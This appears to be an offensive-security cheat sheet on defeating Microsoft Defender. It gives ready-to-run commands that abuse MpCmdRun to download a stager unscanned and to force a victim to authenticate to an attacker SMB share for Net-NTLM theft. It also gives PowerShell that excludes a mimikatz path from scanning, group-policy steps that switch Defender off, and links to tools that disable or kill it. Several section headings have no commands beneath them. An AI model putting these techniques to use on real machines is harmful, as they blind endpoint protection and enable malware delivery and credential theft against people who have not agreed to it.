Defender

• https://github.com/0xsp-SRD/MDE_Enum

Download stager without triggering Defender to scan it:

Cmd > "C:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile -Url http://127.0.0.1/met.exe -Path C:\Users\user\music\met.exe

Coerce the victim machine to reach the attacker (to steal Net-NTLM):

Cmd > "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File '\\10.10.13.37\share\file'

Exclusions

• https://blog.fndsec.net/2024/10/04/uncovering-exclusion-paths-in-microsoft-defender-a-security-research-insight/

• https://github.com/Friends-Security/SharpExclusionFinder

Add path to exclusions:

PS > $mimi = "C:\Users\user\music\mimi\x64\mimikatz.exe"
PS > Add-MpPreference -ExclusionPath $mimi [-AttackSurfaceReductionOnlyExclusions $mimi]

Test path for an exclusion:

PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\folder_to_check\|*"

Disable Defender

• https://github.com/mandiant/commando-vm#pre-install-procedures

• https://github.com/swagkarna/Defeat-Defender-V1.2

• https://github.com/APTortellini/DefenderSwitch

• https://github.com/dosxuz/DefenderStop

• https://gist.github.com/fiercebrute/46e0636c0eaf72dcd3df4e280b6792d6

• http://www.wxxy-sec.com/?p=154

• gpedit.msc > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Real-time Protection > Turn off real-time protection > Enabled ✔

• gpedit.msc > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Turn off Microsoft Defender Antivirus > Enabled ✔

Disable real-time protection (proactive):

Disable scanning all downloaded files and attachments, disable AMSI (reactive):

Remove signatures (if Internet connection is present, they will be downloaded again):

Clear threats history manually:

Lower Token Integrity

• https://elastic.github.io/security-research/whitepapers/2022/02/02.sandboxing-antimalware-products-for-fun-and-profit/article/

• https://github.com/plackyhacker/SandboxDefender

• https://github.com/pwn1sher/KillDefender

• https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools

Windows Security Center API (WSC)

• https://blog.es3n1n.eu/posts/how-i-ruined-my-vacation/

• https://github.com/es3n1n/defendnot

defendnot

• https://github.com/es3n1n/defendnot

• https://www.huntress.com/blog/defendnot-detecting-malicious-security-product-bypass-techniques